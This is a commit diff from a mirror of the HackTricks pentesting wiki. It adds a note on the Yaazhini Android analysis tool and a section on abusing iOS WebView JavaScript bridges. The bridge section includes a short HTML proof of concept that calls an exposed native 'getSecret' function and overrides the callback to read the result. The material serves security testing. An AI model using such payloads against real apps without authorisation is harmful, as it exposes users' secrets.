Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-25 14:10:41 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] 476 pages and one asset modified

Browse source
This commit is contained in:
CPol 2021-05-30 10:46:48 +00:00 committed by gitbook-bot
parent d6f70bd9f9
commit d696378710
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
3 changed files with 25 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

BIN
.gitbook/assets/image (466).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 872 KiB

6
mobile-apps-pentesting/android-app-pentesting/README.md
View file

@ -479,6 +479,12 @@ adb shell settings put global http_proxy :0
```
{% endhint %}
### [Yaazhini](https://www.vegabird.com/yaazhini/)
This is a **great tool to perform static analysis with a GUI**
![](../../.gitbook/assets/image%20%28466%29.png)
### [Qark](https://github.com/linkedin/qark)
This tool is designed to look for several **security related Android application vulnerabilities**, either in **source code** or **packaged APKs**. The tool is also **capable of creating a "Proof-of-Concept" deployable APK** and **ADB commands**, to exploit some of the found vulnerabilities \(Exposed activities, intents, tapjacking...\). As with Drozer, there is no need to root the test device.

19
mobile-apps-pentesting/ios-pentesting/ios-webviews.md
View file

@ -255,6 +255,24 @@ function invokeNativeOperation() {
value2 = document.getElementById("value2").value
window.webkit.messageHandlers.javaScriptBridge.postMessage(["multiplyNumbers", value1, value2]);
}
//After testing the previos funtion I got the error TypeError: undefined is not an object (evaluating 'window.webkit.messageHandlers')
//But the following code worked to call the exposed javascriptbridge with the args "addNumbers", "1", "2"
document.location = "javascriptbridge://addNumbers/" + 1 + "/" + 2
```
Once the Native function es executed it usually will **execute some JavaScript inside the web page** \(see `evaluateJavascript` below\) you can be interested on **overriding the function** that is going to be executed to **steal the result**.
For example, in the script below the function **`javascriptBridgeCallBack`** is going to be executed with 2 params \(the called function and the **result**\). If you control the HTML that is going to be loaded you can create an **alert with the result** like:
```markup
<html>
<script>
document.location = "javascriptbridge://getSecret"
function javascriptBridgeCallBack(name, result) {
alert(result);
}
</script>
</html>
```
### Called Function
@ -315,4 +333,5 @@ With those limitations in mind, here are the steps to remotely debug a webview i
## References
* [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction\#testing-webview-protocol-handlers-mstg-platform-6](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-webview-protocol-handlers-mstg-platform-6)
* [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS)